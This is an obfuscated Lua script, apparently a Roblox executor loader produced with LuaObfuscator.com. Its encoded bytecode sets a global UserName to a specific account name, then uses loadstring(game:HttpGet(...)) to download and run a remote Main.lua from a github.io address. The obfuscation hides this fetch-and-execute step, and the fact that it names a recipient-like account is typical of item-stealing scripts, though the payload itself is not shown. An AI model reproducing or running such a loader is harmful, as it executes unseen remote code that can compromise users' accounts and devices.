--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v31=1678 -(1650 + 28) ;local v32;local v33;local v34;local v35;local v36;local v37;local v38;while true do if (v31==1) then v34=nil;v35=nil;v31=848 -(637 + 209) ;end if (v31~=(1632 -(37 + 1592))) then else v38=nil;while true do local v75=311 -(114 + 197) ;while true do if ((1802 -(60 + 1741))~=v75) then else if (v32==(1572 -(713 + 856))) then local v100=0 + 0 ;while true do if (v100==(0 -0)) then for v109=1 -0 ,v24() do v34[v109-(1 + 0) ]=v29();end for v111=1 + 0 ,v24() do v35[v111]=v24();end v100=1248 -(392 + 855) ;end if ((1606 -(116 + 1489))~=v100) then else return v36;end end end if (v32~=(1796 -(299 + 1495))) then else local v101=0;local v102;while true do if (v101==0) then v102=0;while true do if ((117 -(40 + 76))==v102) then for v125=1,v24() do local v126=0 + 0 ;local v127;local v128;while true do if (v126==(1584 -(1107 + 476))) then while true do if (v127~=(0 + 0)) then else v128=v22();if (v21(v128,1,1)~=(0 -0)) then else local v161=0;local v162;local v163;local v164;local v165;local v166;while true do if (v161==(1038 -(877 + 159))) then v166=nil;while true do if (v162==(20 -(11 + 7))) then while true do if (v163==(2 -1)) then local v180=0;while true do if ((3 -2)~=v180) then else v163=2 -0 ;break;end if (v180==0) then local v190=0;local v191;while true do if (v190==(0 -0)) then v191=0;while true do if (v191==(0 + 0)) then local v194=0 -0 ;while true do if (v194==(0 + 0)) then v166={v23(),v23(),nil,nil};if (v164==(963 -(65 + 898))) then local v200=0 + 0 ;local v201;while true do if (v200==(0 -0)) then v201=0 + 0 ;while true do if (v201==(0 -0)) then v166[1041 -(587 + 451) ]=v23();v166[850 -(245 + 601) ]=v23();break;end end break;end end elseif (v164==1) then v166[5 -2 ]=v24();elseif (v164==(7 -5)) then v166[3 + 0 ]=v24() -((1 + 1)^(1269 -(932 + 321))) ;elseif (v164==(3 + 0)) then local v206=210 -(100 + 110) ;local v207;local v208;while true do if (v206==1) then while true do if (v207==(0 -0)) then v208=1089 -(358 + 731) ;while true do if (v208~=(0 + 0)) then else v166[742 -(391 + 348) ]=v24() -(2^(1514 -(440 + 1058))) ;v166[6 -2 ]=v23();break;end end break;end end break;end if (v206==0) then v207=1907 -(969 + 938) ;v208=nil;v206=1;end end end v194=223 -(70 + 152) ;end if (v194==(1 + 0)) then v191=1 + 0 ;break;end end end if (v191==1) then v180=1;break;end end break;end end end end end if (v163==0) then local v181=1381 -(669 + 712) ;local v182;while true do if (v181~=(710 -(245 + 465))) then else v182=0 + 0 ;while true do if (v182==(1129 -(47 + 1082))) then local v192=0 + 0 ;while true do if (v192~=(0 + 0)) then else local v195=312 -(154 + 158) ;while true do if ((1 + 0)==v195) then v192=1 -0 ;break;end if (v195==(0 -0)) then v164=v21(v128,4 -2 ,1723 -(666 + 1054) );v165=v21(v128,5 -1 ,13 -7 );v195=1;end end end if (v192~=(1 + 0)) then else v182=2 -1 ;break;end end end if (v182==(433 -(212 + 220))) then v163=1;break;end end break;end end end if (v163==(3 -0)) then if (v21(v165,514 -(311 + 200) ,6 -3 )~=1) then else v166[1629 -(349 + 1276) ]=v38[v166[14 -10 ]];end v33[v125]=v166;break;end if ((3 -1)~=v163) then else local v184=1411 -(338 + 1073) ;local v185;while true do if (v184==0) then v185=0;while true do if ((2 -1)==v185) then v163=3;break;end if (v185~=(0 + 0)) then else local v193=0 + 0 ;while true do if (v193==(0 + 0)) then if (v21(v165,16 -(14 + 1) ,2 -1 )==1) then v166[1665 -(873 + 790) ]=v38[v166[799 -(146 + 651) ]];end if (v21(v165,2,2 + 0 )==(1773 -(984 + 788))) then v166[3]=v38[v166[5 -2 ]];end v193=3 -2 ;end if (v193~=(1 + 0)) then else v185=1;break;end end end end break;end end end end break;end if (v162==(1 + 0)) then v165=nil;v166=nil;v162=1 + 1 ;end if (v162==(0 -0)) then local v178=0;while true do if (v178==(423 -(269 + 154))) then v163=0 + 0 ;v164=nil;v178=1;end if (1==v178) then v162=1;break;end end end end break;end if (v161~=0) then else v162=0;v163=nil;v161=1547 -(335 + 1211) ;end if (v161==1) then v164=nil;v165=nil;v161=87 -(33 + 52) ;end end end break;end end break;end if (v126==(0 + 0)) then v127=255 -(209 + 46) ;v128=nil;v126=1238 -(402 + 835) ;end end end v32=3;break;end if (v102==(414 -(374 + 40))) then for v129=1 + 0 ,v37 do local v130=949 -(105 + 844) ;local v131;local v132;local v133;local v134;while true do if (v130~=(4 -2)) then else while true do if (v131~=(1 + 0)) then else v134=nil;while true do if ((1 + 0)==v132) then if (v133==1) then v134=v22()~=0 ;elseif (v133==2) then v134=v25();elseif (v133~=(6 -3)) then else v134=v26();end v38[v129]=v134;break;end if (v132==(1123 -(925 + 198))) then local v168=1417 -(605 + 812) ;while true do if (v168==0) then v133=v22();v134=nil;v168=1762 -(222 + 1539) ;end if ((1122 -(516 + 605))~=v168) then else v132=891 -(180 + 710) ;break;end end end end break;end if (v131==(0 -0)) then local v157=0 -0 ;while true do if (v157~=1) then else v131=3 -2 ;break;end if (v157==(0 -0)) then v132=0 -0 ;v133=nil;v157=1089 -(451 + 637) ;end end end end break;end if (v130==(1659 -(871 + 787))) then v133=nil;v134=nil;v130=5 -3 ;end if (v130==(0 -0)) then v131=0 + 0 ;v132=nil;v130=1;end end end v36[70 -(23 + 44) ]=v22();v102=1;end end break;end end end break;end if (v75==(0 -0)) then local v95=0 + 0 ;while true do if (v95==(1092 -(10 + 1082))) then if (v32==1) then local v104=0 + 0 ;local v105;while true do if (v104~=(0 -0)) then else v105=1804 -(315 + 1489) ;while true do if (v105==(674 -(347 + 327))) then local v146=0;while true do if (v146==(1459 -(705 + 754))) then v36={v33,v34,nil,v35};v37=v24();v146=1;end if (v146~=(1 -0)) then else v105=521 -(391 + 129) ;break;end end end if (v105~=(292 -(229 + 62))) then else v38={};v32=1434 -(1143 + 289) ;break;end end break;end end end if (v32==0) then local v106=0 -0 ;while true do if (v106~=(255 -(55 + 199))) then else v35={};v32=1;break;end if ((0 + 0)~=v106) then else v33={};v34={};v106=1;end end end v95=1;end if (v95==(1 -0)) then v75=2 -1 ;break;end end end end end break;end if (v31~=(1412 -(909 + 501))) then else v36=nil;v37=nil;v31=3;end if (v31==(0 + 0)) then v32=578 -(256 + 322) ;v33=nil;v31=1;end end end v18=5;end if (v18==2) then function v23()local v39,v40=v1(v16,v19,v19 + 2 + 0 );v19=v19 + (1955 -(1707 + 246)) ;return (v40 * (70 + 186)) + v39 ;end v24=nil;function v24()local v41,v42,v43,v44=v1(v16,v19,v19 + (8 -5) );v19=v19 + 2 + 2 ;return (v44 * (16777805 -(201 + 388))) + (v43 * (37309 + 7455 + 20772)) + (v42 * (634 -378)) + v41 ;end v25=nil;v18=3;end if (v18==3) then function v25()local v45=v24();local v46=v24();local v47=(4 -2) -(1 + 0) ;local v48=(v21(v46,143 -(32 + 110) ,20) * (2^(10 + 22))) + v45 ;local v49=v21(v46,21,8 + 23 );local v50=((v21(v46,897 -(692 + 173) )==(1 + 0)) and  -(1 + 0)) or (320 -(235 + 16 + 68)) ;if (v49==(1369 -(276 + 1093))) then if (v48==((539 + 1423) -(164 + 1798))) then return v50 * (0 + (256 -(138 + 118))) ;else v49=1 -0 ;v47=0 -0 ;end elseif (v49==(2742 -(43 + (1150 -498)))) then return ((v48==(1948 -(1005 + 943))) and (v50 * ((1 + 0 + 0)/0))) or (v50 * NaN) ;end return v8(v50,v49-((1561 -(147 + 21)) -(42 + 328)) ) * (v47 + (v48/(2^52))) ;end v26=nil;function v26(v51)local v52;if  not v51 then v51=v24();if (v51==(1148 -(527 + 621))) then return "";end end v52=v3(v16,v19,(v19 + v51) -(1154 -(227 + 926)) );v19=v19 + v51 ;local v53={};for v67=1 + 0 , #v52 do v53[v67]=v2(v1(v3(v52,v67,v67)));end return v6(v53);end v27=v24;v18=4;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54)if (v1(v54,2)==79) then v20=v0(v3(v54,1,1));return "";else local v69=v2(v0(v54,16));if v20 then local v76=v5(v69,v20);v20=nil;return v76;else return v69;end end end);v21=nil;v18=1;end if (v18==1) then function v21(v55,v56,v57)if v57 then local v70=(v55/((7 -5)^(v56-(4 -(2 + 1)))))%(2^(((v57-((356 -(212 + 143)) + 0)) -(v56-(2 -1))) + 1 + 0)) ;return v70-(v70%(344 -(73 + (495 -(63 + 162))))) ;else local v71=2^(v56-((687 -(123 + 563)) -0)) ;return (((v55%(v71 + v71))>=v71) and (560 -(224 + 335))) or 0 ;end end v22=nil;function v22()local v58=374 -(41 + 38 + 295) ;local v59;while true do if (v58==(2 -1)) then return v59;end if (v58==(0 + 0)) then v59=v1(v16,v19,v19);v19=v19 + (2 -1) ;v58=1 + 0 ;end end end v23=nil;v18=2;end if (v18==5) then v30=nil;function v30(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (1==v63) then v66=v60[3];return function(...)local v77=1;local v78= -1;local v79={...};local v80=v12("#",...) -1 ;local function v81()local v82=v64;local v83=v65;local v84=v66;local v85=v28;local v86={};local v87={};local v88={};for v92=0,v80 do if ((((8473 -(10 + 906)) -(10541 -6365))<=(5080 -(532 + 698))) and (v92>=v84)) then v86[v92-v84 ]=v79[v92 + (1682 -(465 + 1216)) ];else v88[v92]=v79[v92 + 1 + 0 ];end end local v89=(v80-v84) + 1 + 0 ;local v90;local v91;while true do local v93=0 + 0 ;while true do if ((v93==(0 -(1049 -(43 + 1006)))) or ((2682 -(202 + 50 + 385))>=3237)) then local v103=0 -0 ;while true do if (((437 + 2940)>=(1675 -640)) and (v103==(0 -0))) then v90=v82[v77];v91=v90[1 + 0 ];v103=1 + (0 -0) ;end if ((v103==(1 + 0)) or (((4319 + 9078) -8846)<((11942 -7191) -(362 + 698)))) then v93=4 -3 ;break;end end end if (((6014 -3581)==(1461 + 972)) and ((1 + 0)==v93)) then if (((5832 -(750 + 202))>(8205 -3757)) and (v91<=5)) then if ((v91<=(1004 -(262 + 740))) or (((1640 + 7935) -6273)>(754 + 4229))) then if ((v91<=(0 -0)) or ((713 + 895)==((3486 -(563 + 821)) -1082))) then local v114=0 + 0 + 0 ;local v115;local v116;while true do if (((1721 -(860 + 240 + 122))<(640 + 765)) and (v114==(3 -2))) then while true do if (((2997 -(437 + 1509))<(12777 -8024)) and (v115==(0 + 0))) then v116=v90[431 -(41 + 388) ];v88[v116]=v88[v116](v13(v88,v116 + ((3060 -(1654 + 45)) -(1063 + 297)) ,v78));break;end end break;end if (((2948 + 1139)>=(9006 -6537)) and (v114==(0 + 0))) then v115=0 -0 ;v116=nil;v114=685 -(533 + 151) ;end end elseif (((14990 -11073)==(7455 -3538)) and (v91==(283 -((50 -22) + 161 + 93)))) then v88[v90[2 + 0 ]]=v90[1 + 2 ];else v88[v90[2 + 0 ]]();end elseif ((v91<=3) or ((118 + (30 -7))>=(4204 -(657 + 212)))) then local v117=402 -(42 + (1852 -(279 + 1213))) ;local v118;local v119;local v120;local v121;local v122;while true do if (((4165 -(1534 + 364))>=(837 + 508)) and (v117==(1 -0))) then local v147=0 -0 ;while true do if ((v147==(0 + 0)) or ((4259 + (451 -288))<=(1364 -(261 + 216)))) then v120=nil;v121=nil;v147=1 + 0 ;end if (((4085 -(128 + 3))>=(3245 -(3587 -(623 + 692)))) and (v147==(1 + 0))) then v117=4 -2 ;break;end end end if (((586 -(272 + 314))==v117) or ((1346 + 559)==(8924 -4841))) then v118=0 -0 ;v119=nil;v117=1 -0 ;end if ((((792 + 836) -(253 + 435))<=(6896 -(1765 + 200))) and (v117==(4 -2))) then v122=nil;while true do if (((1331 + 60)>(3160 -(1078 + 788))) and ((1 -0)==v118)) then local v153=0 -0 ;local v154;while true do if (((0 + 0)==v153) or ((1320 + 1045)==661)) then v154=0 -(1661 -(584 + 1077)) ;while true do if (((14364 -10909)>=(1321 -((2066 -(303 + 1571)) + 104))) and (v154==(1 + 0))) then v118=2 + 0 ;break;end if ((v154==((1601 -(336 + 1265)) -0)) or ((4112 -(591 + 497))<=(767 + 1212))) then local v174=0;while true do if ((v174==(0 + 0)) or ((2147 + 902)<=(2614 -(49 + 1129)))) then v78=(v121 + v119) -(1 + 0) ;v122=0 + 0 ;v174=1 + 0 ;end if (((6436 -(80 + 1613))>(1273 -(85 + 339))) and (v174==(1944 -(429 + 1514)))) then v154=3 -(2 -0) ;break;end end end end break;end end end if ((0==v118) or ((12461 -7783)<=(899 + 150))) then local v155=0 -0 ;local v156;while true do if (((0 -0)==v155) or (1690>(2549 -(104 + 165)))) then v156=0 + 0 ;while true do if (((2599 + 1078)==(3318 + 359)) and (v156==(1201 -(713 + 488)))) then v119=v90[1 + 1 ];v120,v121=v85(v88[v119](v13(v88,v119 + (1601 -(1384 + 216)) ,v90[813 -(116 + 694) ])));v156=3 -2 ;end if ((v156==(1206 -(641 + 564))) or (((1282 -920) + (2587 -(193 + 97)))>=(5607 -(367 + 1928)))) then v118=(447 -(53 + 391)) -2 ;break;end end break;end end end if (((3841 -((1276 -(46 + 136)) + 679))<=(10286 -5896)) and (v118==(1 + 1))) then for v158=v119,v78 do local v159=994 -(28 + 152 + 814) ;local v160;while true do if (((5592 -((1058 -(350 + 647)) + 707))>=(1128 + 2070)) and (v159==((971 -(167 + 804)) + 0))) then v160=0 + (1871 -(564 + 1307)) ;while true do if (((5290 -(645 + 603))>(4535 -(3973 -(33 + 325)))) and (v160==(1762 -(722 + 1040)))) then v122=v122 + (2 -1) ;v88[v158]=v120[v122];break;end end break;end end end break;end end break;end end elseif (((2558 + 152)<=(5925 -2454)) and (v91==((202 -(65 + 133)) -0))) then v77=v90[4 -1 ];elseif ((v88[v90[4 -2 ]]==v90[1 + 3 ]) or ((3601 -(1593 + 147))==(295 + 446))) then v77=v77 + (1910 -(1042 + 867)) ;else v77=v90[2 + (2 -1) ];end elseif ((((2284 + 4426) -2201)>(9186 -5106)) and (v91<=8)) then if ((v91<=(6 + 0)) or ((4745 -(619 + 809))>(12092 -7588))) then do return;end elseif (((7061 -3701)==(3557 -((523 -330) + (1997 -(163 + 1830))))) and (v91==((24 -12) -5))) then for v148=v90[1 + 1 ],v90[(28 + 379) -(320 + 84) ] do v88[v148]=nil;end else v88[v90[1 + 1 ]]=v62[v90[592 -(412 + 177) ]];end elseif (((1518 + 105)<=(7307 -3398)) and (v91<=(41 -32))) then v62[v90[532 -(324 + 205) ]]=v88[v90[2 + 0 ]];elseif ((v91==(10 + 0)) or ((3018 + 1363)<=(1484 + 1037))) then v88[v90[1 + 1 ]]=v90[6 -3 ]~=((0 + 0) -0) ;else local v141=740 -(106 + 634) ;local v142;local v143;local v144;local v145;while true do if ((v141==(343 -(34 + 167 + 140))) or ((3910 -(588 + 906))==(111 + 154))) then while true do if (((3835 -(573 + 190))>=(1946 -(706 + 1118))) and (v142==(0 -0))) then v143=0 -0 ;v144=nil;v142=1 + 0 ;end if (((954 + 1033)>=(3158 -2245)) and (v142==(119 -(41 + 77)))) then v145=nil;while true do if (((3819 -1570)<4052) and (v143==(388 -((926 -(387 + 414)) + 262)))) then v88[v144 + (1 -0) ]=v145;v88[v144]=v145[v90[(6 + 1) -3 ]];break;end if (((1050 -603)<=(5008 -(53 + 862))) and ((0 -0)==v143)) then local v172=0 -0 ;local v173;while true do if (((3603 -(807 + 1044))<=(8644 -3828)) and (v172==(885 -(505 + 380)))) then v173=0 -0 ;while true do if ((((3964 -1597) -(456 + 412))<(30 + 1742)) and ((1672 -(757 + 915))==v173)) then local v179=1221 -(111 + 1110) ;while true do if (((8030 -4522)>=(2110 + 1335)) and (v179==(0 -0))) then v144=v90[1 + 1 ];v145=v88[v90[1 + 2 ]];v179=1 + 0 ;end if (((5503 -3353)==(2757 -(535 + 72))) and (v179==(553 -(383 + 169)))) then v173=1 + 0 ;break;end end end if ((v173==(4 -3)) or ((2417 -(1757 + (1158 -(21 + 977))))==(3542 -(576 + 584)))) then v143=1;break;end end break;end end end end break;end end break;end if (((3164 -((2221 -1387) + (2174 -(335 + 1518))))>(336 + 123)) and (v141==(1976 -(46 + 1930)))) then v142=0 -0 ;v143=nil;v141=4 -3 ;end if (((5345 -2522)==(7379 -4556)) and (v141==(1 -0))) then v144=nil;v145=nil;v141=2 + 0 + 0 ;end end end v77=v77 + 1 ;break;end end end end A,B=v28(v11(v81));if  not A[1] then local v94=v60[4][v77] or "?" ;error("Script error at ["   .. v94   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!073O00028O0003083O00557365724E616D6503143O006F2O66696369616C77692O6C6F777367616D6573030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F72692O7A36392E6769746875622E696F2F4D61696E2E6C756100163O0012013O00014O0007000100013O0026053O000200010001002O043O00020001001201000100013O0026050001000500010001002O043O00050001001201000200033O001209000200023O001208000200043O001208000300053O00200B000300030006001201000500074O000A000600014O0003000300066O00023O00022O0002000200010001002O043O00150001002O043O00050001002O043O00150001002O043O000200012O00063O00017O00163O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);end
